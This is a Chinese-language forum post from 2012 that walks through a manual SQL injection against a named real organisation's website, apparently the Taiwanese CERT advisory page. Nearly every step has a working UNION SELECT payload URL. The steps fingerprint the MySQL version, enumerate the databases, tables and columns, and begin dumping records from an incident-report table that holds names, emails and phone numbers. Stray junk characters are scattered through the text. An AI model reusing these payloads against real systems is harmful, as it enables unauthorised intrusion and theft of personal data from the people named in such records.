1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询2 a" j/ V, n9 ^" W: ^% I4 v
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解: a' w# A9 {" M9 N
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
, Y( x# g$ g5 l$ [% }0 G3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
" T8 D5 x, ]: d: @8 |0 M数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。, r+ h/ M7 e" }% A# k
4.判断有没有写权限: w7 h' x- l' Q
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限) \5 P8 V: \. _ i4 I
没办法,手动猜表啦7 Y! z) ~+ c# ?* ~2 S- d
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
: H5 G: I- A) ?0 U但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下1 a' ?4 p. Q+ S8 T* N5 H( `# J
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
: i- _ p. V% z成功查出所有数据库,国外的黑客就是不一般。数据库如下:, k6 W" c. N8 m; s7 X. A8 W w
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb+ n* H' j2 K0 w- W% x9 w5 o
6.爆表,爆的是twcert库2 m+ Z8 g) V0 a% k! k3 a; I; W9 o# d
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
5 }( Q8 c8 V, p, s, e$ ? o爆出如下表
! F, _& X! O- W9 g! G7 Qdownloadfile,irsys,newsdata,secrpt,secrpt_big58 S r# l7 j8 m% E" B2 o1 _- S& Y
7.爆列名,这次爆的是irsys表9 c3 V' V& a; E. J
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--- H$ _( A2 V1 |5 {6 T( s( R
爆出如下列
5 t! o0 b' i. H; a* D5 Sir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
0 j% D" h0 d" L( |3 N1 F/ W! Y8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
; O! R, _4 n! O2 X' k" B2 P) j: k6 ?http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
) W2 [% X, H/ |; J返回是3,说明每个列里有3个地段
) M% J. b7 u- V1 Y, E9.爆字段内容
) j9 _- }1 c! u7 C7 khttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--8 n7 M! K* ^* S2 K3 @. [
爆出name列的第一个字段的内容; R) Q; L4 h9 x/ ?* C b, Q: O
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
2 P7 q- H$ d; l I% _爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对